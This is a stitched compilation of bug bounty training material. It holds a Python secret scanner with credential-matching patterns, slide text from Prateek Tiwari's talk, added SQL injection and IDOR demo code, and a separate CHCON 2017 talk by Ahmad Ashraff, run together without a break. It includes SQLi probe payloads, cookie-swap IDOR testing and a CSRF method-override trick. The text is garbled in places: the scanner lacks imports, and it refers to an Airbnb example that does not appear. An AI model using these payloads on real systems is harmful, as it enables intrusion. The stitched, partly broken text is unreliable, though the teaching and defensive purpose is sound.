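from typing import List

# Key names taken from the slides; the value must be at least 8 non-space chars.
GENERIC_KEYS = (
    r"api_key|apikey|access_key|accountKey|consumerkey|consumer_secret|"
    r"secret_key|APP_SECRET|JIRA_Password|auth_key|SSO_LOGIN|password|secret"
)

# Order matters only for reporting: the first pattern to match a value names it.
PATTERNS = {
    # AWS access key ids have a fixed shape, so no key name is needed.
    "aws_access_key_id": re.compile(r"\b(AKIA[0-9A-Z]{16})\b"),
    # 40-char base64-ish secret next to an aws_secret* key name.
    "aws_secret": re.compile(
        r"(?i)\b(aws_secret(?:_access_key)?)\s*[:=]\s*['\"]?([A-Za-z0-9/+=]{40})"),
    "jdbc_password": re.compile(r"(?i)jdbc:[^\s'\"]*?password=([^&\s'\"]+)"),
    "bearer_token": re.compile(
        r"(?i)authorization['\"]?\s*[:=]?\s*['\"]?bearer\s+([A-Za-z0-9._=-]{16,})"),
    "generic_key": re.compile(
        r"(?i)\b(" + GENERIC_KEYS + r")['\"]?\s*[:=]\s*['\"]?([^'\"\s]{8,})"),
}

# Values that are almost always templates rather than live secrets (constructed list).
PLACEHOLDER_MARKERS = ("${", "{{", "<", ">", "changeme", "xxxx", "your_")


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    kind: str
    masked: str  # first 4 chars only, so the report never re-leaks the secret


def is_placeholder(value: str) -> bool:
    v = value.lower()
    return any(marker in v for marker in PLACEHOLDER_MARKERS)


def mask(value: str) -> str:
    return value[:4] + "..." + f"({len(value)} chars)"


def scan_text(text: str, path: str = "<stdin>") -> List[Finding]:
    """One Finding per (line, secret value); placeholders are skipped."""
    findings: List[Finding] = []
    seen = set()
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in PATTERNS.items():
            for m in pattern.finditer(line):
                value = m.group(m.lastindex)  # the value is always the last group
                if is_placeholder(value) or (line_no, value) in seen:
                    continue
                seen.add((line_no, value))
                findings.append(Finding(path, line_no, kind, mask(value)))
    return findings


# Constructed sample file: five real-looking leaks and two placeholders.
SAMPLE_CONFIG = """\
# config.py (constructed sample, not a real leak)
API_KEY = "sk_live_9f8e7d6c5b4a3f2e1d0c"
aws_access_key_id = AKIA0123456789ABCDEF
aws_secret_access_key = abcdEFGHijklMNOPqrstUVWXyz0123456789+/==
headers = {"Authorization": "Bearer eyJhbGciOiJIUzI1NiJ9.e30.abcdefghijklmnop"}
DB_URL = "jdbc:mysql://db.internal:3306/app?user=app&password=Hunter2Hunter2"
consumer_secret = ${CONSUMER_SECRET}
password = "changeme"
"""

if __name__ == "__main__":
    # Usage: python scan_secrets.py file1 file2 ...   (no args: scan the sample)
    if len(sys.argv) == 1:
        for f in scan_text(SAMPLE_CONFIG, "sample"):
            print(f"{f.path}:{f.line_no}: {f.kind} {f.masked}")
    for path in sys.argv[1:]:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for f in scan_text(fh.read(), path):
                print(f"{f.path}:{f.line_no}: {f.kind} {f.masked}")
```

Two design points: findings are deduplicated per line so a JDBC URL that also contains password= is reported once, and values are masked before they are printed or written to CI logs, because a scanner that echoes the secret it found has just created a second leak.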
❖ Email: prateek0490@gmail.com
Hey you! What’s Bug Bounty?
What’s Bug Bounty?
● XSS
● CSRF
● Subdomain Takeovers
○ Domains?
○ Subdomains?
○ 3rd Party Services used by Organisation (GitHub, Jira, Trello, Jenkins, GitLab, etc...)
○ IP Ranges?
Even if an organization's Jira instance requires authentication, administrators set up "public" projects and forget that “public” means public for everyone. This can sometimes hand you the keys to the kingdom.
Trello, Jira, Gitlab ...
Thanks Ed :)
fofa.so - Chinese version of Shodan
shodan.io
IP Ranges
https://bgp.he.net/search?search%5Bsearch%5D=Smule&commit=Search
IP Ranges
https://whois.arin.net/ui/query.do
IP Ranges
Sir, I’ve found the IP Space now what?
IP Range - now what?
● Fire NMap and run NSE Scripts on those discovered IP Ranges
○ BurpSuite
○ Dirsearch, Dirbuster
○ Wfuzz
Oh the mobile apps are in scope, what should I look for?
Did you know? You can find leakage of sensitive data in mobile apps without even installing them on your phone. Howwww?
Short Cut:
Long Route:
BURP SPIDER
● XSS
● SQLi
● Privilege Escalation
● IDOR(s)
● More Bugs
Hacking with BurpSuite
● Using “Repeater tab” to find XSS, SQLi, IDOR(s), Privilege Escalation
● Catch a Request which accepts user input and throw it into a repeater tab.
● Start Fuzzing the parameters.
Hacking with BurpSuite
SQLi(s)
id=1'
id=1''
id=1'-sleep(10)-'
id=1"
id=1""
id=1"-sleep(10)-"
id=1/sleep(10)
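Why the first probe in that list, id=1', tells you anything at all is worth seeing from the server side. The code below is an added example, not from the slides: a handler that builds the query by string formatting, beside one that binds the value as a parameter, with a probe() helper that reports what the Repeater user would see for each payload. It uses an in-memory SQLite table with constructed rows, so the MySQL sleep() probes are left out.

```python
# Added example (not from the slides): the bug behind the id=1' probe.
# The vulnerable handler concatenates the parameter into SQL, so a stray
# quote becomes a syntax error (a 500 or a database error page to the
# tester). The fixed handler binds the value, so the same input is just
# data that matches nothing. Constructed in-memory SQLite table.
import sqlite3
from typing import Dict, List, Tuple


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "alpha"), (2, "beta")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, item_id: str) -> List[Tuple[str]]:
    # The request parameter is pasted straight into the statement.
    return conn.execute(f"SELECT name FROM items WHERE id = {item_id}").fetchall()


def lookup_fixed(conn: sqlite3.Connection, item_id: str) -> List[Tuple[str]]:
    # Placeholder plus bound value: the driver never parses the input as SQL.
    return conn.execute("SELECT name FROM items WHERE id = ?", (item_id,)).fetchall()


def probe(handler, conn: sqlite3.Connection, value: str) -> Tuple[str, object]:
    """Mimic one Repeater request: ('ok', rows) or ('error', db message)."""
    try:
        return ("ok", handler(conn, value))
    except sqlite3.Error as exc:
        return ("error", str(exc))


# The quote probes from the slide that SQLite can evaluate.
PROBES = ["1", "1'", '1"']


def run_probes(handler, conn: sqlite3.Connection) -> Dict[str, str]:
    """Outcome per probe; an 'error' on a quote is the injection signal."""
    return {p: probe(handler, conn, p)[0] for p in PROBES}


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", run_probes(lookup_vulnerable, db))  # quotes -> error
    print("fixed:     ", run_probes(lookup_fixed, db))       # quotes -> ok, no rows
```

The detection side is the same observation in reverse: database syntax errors in application logs that coincide with quote characters in request parameters are the trace this probing leaves, and with the fixed handler they simply stop occurring.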
Hacking with BurpSuite
● IDOR(s) are always easy: play with the id parameters and manipulate the create requests.
● Have 2 different user accounts, one low privileged user and the other one with some level of permissions.
● Catch the request in BURPSUITE, throw it into a “Repeater tab”, replace the cookies of the high level privileged user with those of the low level privileged user, and see if it’s a success!
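The Airbnb notification endpoint earlier (a user_id in the POST body decided whose message got pushed) and the cookie-swap test above are the same authorization bug seen from two sides. The handlers below are an added example, not Airbnb's code or anything from the slides: the vulnerable one trusts the body's user_id, the fixed one binds the subject to the session, lets only an admin target someone else, and writes an audit line for refused attempts, which is the signal a detection team alerts on. Inboxes, roles and the Session class are constructed; 109764261 is the id shown on the slide.

```python
# Added example (not Airbnb's code, not from the slides): IDOR on a
# "send me a notification" endpoint, vulnerable and fixed side by side.
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass
class Session:
    user_id: int
    role: str  # "member" or "admin" (constructed roles)


class Forbidden(Exception):
    pass


# Constructed inboxes keyed by user id; 109764261 is the id on the slide.
INBOX: Dict[int, List[str]] = {
    109764261: ["Your booking is confirmed"],
    424242: ["Gate code is 1234"],
}

AUDIT_LOG: List[str] = []


def notify_vulnerable(session: Session, body: dict) -> dict:
    """Pushes the latest message of whichever user_id the client sent."""
    target = body["user_id"]  # never compared with the session
    return {"user_id": target, "body": INBOX[target][-1]}


def notify_fixed(session: Session, body: dict) -> dict:
    """Binds the notification to the authenticated user; admins may target others."""
    target = body.get("user_id", session.user_id)
    if target != session.user_id and session.role != "admin":
        # Same 403 whether or not the target exists: no enumeration oracle.
        AUDIT_LOG.append(f"idor_attempt actor={session.user_id} target={target}")
        raise Forbidden("user_id does not match session")
    if target not in INBOX:
        raise Forbidden("unknown user")
    return {"user_id": target, "body": INBOX[target][-1]}


def handle(handler, session: Session, body: dict) -> Tuple[int, object]:
    """HTTP-style outcome of one request: (status, payload)."""
    try:
        return 200, handler(session, body)
    except Forbidden as exc:
        return 403, str(exc)


if __name__ == "__main__":
    low = Session(user_id=109764261, role="member")
    print(handle(notify_vulnerable, low, {"user_id": 424242}))  # leaks another inbox
    print(handle(notify_fixed, low, {"user_id": 424242}))       # 403 + audit line
    print(AUDIT_LOG)
```

The cookie-swap test maps onto the second function directly: a low-privilege session replaying a high-privilege request is the `session.role != "admin"` branch, and a handler that never consults the session at all is the first function.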
Hacking with BurpSuite
JS for the WIN
https://github.com/GerbenJavado/LinkFinder
Feeding these into the tool:
python linkfinder.py -i /Desktop/z.burp -b -o cli
Shooting in Dark? Understand the application flow to find more bugs
You’re doing it wrong - Found an internal endpoint in JS and immediately knew what parameters to use based on my past research
Read the Docs = Get a BUG?
Few Nice Reads:
● Static Analysis of Client-Side JavaScript for pen testers and bug bounty hunters - https://blog.appsecco.com/static-analysis-of-client-side-javascript-for-pen-testers-and-bug-bounty-hunters-f1cb1a5d5288
● Discovering hidden endpoints using LinkFinder - https://gerbenjavado.com/discovering-hidden-content-using-linkfinder/
● Getting started in Bug Bounty - https://medium.com/@ehsahil/getting-started-in-bug-bounty-7052da28445a
Better Bug Bounty Report
better relationship
better bounties
Sharing from other side of the fence
What you shouldn’t do?
● Bounty Plz!
● Introduction
● Details
● Steps to reproduce (POC)
● Impact
Sharing from other side of the fence
Before reporting, always think from the organization’s point of view, from the other side of the fence:
Seeing an image of other users on a company like Zomato? Seriously, are you kidding me? That’s not sensitive at all - closing it as N/A.
Subscribe to topics like Information Security, Bug Bounty, Infosec, etc.
Keeping up with new trends
Hacktivity! https://hackerone.com/hacktivity
ZERO DAILY!
https://hackerone.com/zerodaily
Profit!! Time to earn bounties...
LIVE BURP SUITE SESSION
#bugbountytip
Waybackurls
● Always run wfuzz / dirsearch on all subdomain(s) found to discover more content, more bounties?
● Earlier this year, I got a bounty for redacted.corp.com/documentation and found an excel spreadsheet of the database, eehhh, easy money 😳
● Can’t CSRF a delete method? A few frameworks / API(s) allow “faking” methods via additional parameters, ex:
○ Adding a parameter such as method=delete | _method=delete -> the API will parse it as a Delete request.
#bugbountytip
● Always check whether Strict Transport Security is enforced. Many a time, hxxp://redacted.com is not redirected to https; many companies are interested to hear about a “Weak Login function over HTTP”.
Recap | Let’s Roll It Back
Prateek Tiwari
prateek0490@gmail.com
@prateek_0490
linkedin.com/in/prateek-tiwari-867b905a/
facebook.com/prateek0490
29/11/17
Journey to the top
on
CHCON 2017
29/11/17
About Me
o Ahmad Ashraff @yappare
o Origin: Malaysia
o Education: Bachelor of Chemical Engineering
o Experience: +7 years in ITSec industry
o Current: Security Consultant at Aura Information Security
o Hobbies: Backpacking, Watching Animes
About the Presentation
o What is bug bounty program
o Why I started bug hunting
o Problems and troubles – How I encountered them
o Tips and Tricks
o Hope people stop asking me “How many bugs did you find last weekend?”
What is bug bounty program?
https://en.oxforddictionaries.com/definition/bug_bounty
How companies manage bug bounty programs
o Own programs
o Self-managed via 3rd party platform
o Managed by 3rd party platform
Why I Started Bug Bounty?
Expenses: Car/Transport, Kids, Event, Married, Study Loan, House, Gadgets, Travelling, Hobbies, Parents, and the $%#^#& that might happen
~$850 paid per month
3rd August 2012
4 months later
1 XSS – Found in less than a day = $500
Monthly paid = ~$850
1 XSS in Paypal > Half of monthly paid
Study Loans, Personal Loans, Cars, Credit Cards
It is not just about money
Hi folks, meet… (annotated https://bugcrowd.com/leaderboard)
o Joined at Tesla as Security
o BugCrowd Technical Operation
o Doing windows server configuration review.
o 2015. 1st place. Looks good
o Oct 2016. Started to be a busy guy. Lost from the radar.
o A wizard
o Normal human being
o Talented full-time bughunter from UK
o Anonymous
o Attack-dev
Public VS Private Programs in Bugcrowd
Public
• Can participate once registered
• Kudos/Rewards
• Tested multiple times
• Orgs ready to go to public
• Web, mobile, hardware, API, IOT
Private
• Two types, ongoing & flex (on-demand)
• Kudos/Rewards
• Web, mobile, hardware, API, IOT
• Tested few times or fresh
• Orgs want to be tested by trusted users
Problems
• Equipment and Tools
• Tough competition. Experts everywhere
• Fast and Furious. Really fast. Need to avoid duplicate submission (5 MINUTES, 30 MINUTES, 55 MINUTES)
• Most programs start at UTC time zone. Me in NZST.
• Able to optimize my free times and use ~10 hours per week
Tips 1 – Focus on less participants
Mobile Applications
• Windows < iOS < Android
• Cert Pinning
IoT/Device
• Specific device need to be purchased
• Need knowledge, tools. Preparing is a mess
Scripts/Binary
• Dev knowledge, binary exploitation
• Fuzzing technique
Wide targets
• Reverse recon, automated + manual
Reverse recon
• Check on their production environment
• Check on their old sites of the production through wayback archive
• Check on their support/issues website
Can do this back to back
Wide targets (*.blabla.com, all BlaBla’s public websites)
• Automated: Google/Bing/Yahoo, subdomain scanner, wayback archive, CMS scanner, Github, known vulnerabilities
• Manually: support
AQUATONE (https://github.com/michenriksen/aquatone)
• discovery (aquatone-discover): Threat Crowd, HackerTarget, Certificate Search (crt.sh), Google Transparency Report, Censys, Shodan, DNSDB, Riddler, VirusTotal, PassiveTotal, Dictionary, Netcraft
• scanning
• aquatone-takeover: Find misconfigured DNS setup
• gathering (aquatone-gather): Access the discovered web ports and provide headers information plus screenshot
Tips 2 – Risk Matrix Used
P1 – 40 points + $1500
P2 – 20 points + $900
P3 – 10 points + $300
P4 – 10 points + $100
P5 – 0 points + $0
Bugcrowd’s VRT is a resource outlining Bugcrowd’s baseline priority rating, including certain edge cases, for vulnerabilities that we often see.
Cool bugs vs. not-so-cool bugs
Still a P3 risk. Still received the same points
Still received the points and rewards
Tips 3 – Do Not Stop at One Attack
http://www.brokensites.com/admin/login.php?redirect_url=/dashboard
Candidate attacks on the one parameter: Open Redirect? XSS? Lack of bruteforce protection? Cleartext? Default/Weak Creds? SSRF? RCE?
Ratings on the slide: P4 = 5 + $100 (twice), P3 = 10 + $300 (three times), P1 = 40 + $1500 (twice)
Total points : 120
Total rewards: $4100
Same parameter, same program, different time of submission, different attacks, 1 dupe, 1 valid.
Tips 4 – Mobile View
• Redirected to main page
• Forbidden
• No Access
Try: m.website.com, mobile.website.com, touch.website.com, www.website.com/m/, www.website.com/mobile
• Redirected to mobile page
• New session cookies?
• More features
• More user inputs
• Lack of security checks
Tips 5 – Be Friend with JS Files
Time consuming, but it is worth your effort
• Hardcoded credentials
• Backup/Github/Dev sites
• Method of encryption
View source > find .js > analyse
https://bountysite.com/admin/dashboard?redirect=/
Check on login.js: https://bountysite.com/admin/dashboard/js/login.js
Check on another JS: https://bountysite.com/admin/dashboard/photography/loginx
P1 = 40 + $1000
Tips X – Out of Scope
Some of the programs have a number of out of scope issues that they don’t want to see.
I don’t participate.
List of tools
• Burp Suite Pro
• Recon tools
Aquatone - https://github.com/michenriksen/aquatone
Spiderfoot - http://www.spiderfoot.net/
Enumall - https://github.com/jhaddix/domain
Sublist3r - https://github.com/aboul3la/Sublist3r
• Scanning tools
WPScan - https://wpscan.org/
Droopescan - https://github.com/droope/droopescan
SQLMap - http://sqlmap.org/
OXML_XXE - https://github.com/BuffaloWill/oxml_xxe
• JS Parser
https://github.com/zseano/JS-Scan
https://github.com/nahamsec/JSParser
Thank you to
• Christchurch Conference 2017
• Aura Information Security
• BugCrowd
• Bug hunters all over the world
• BurpSuite Pro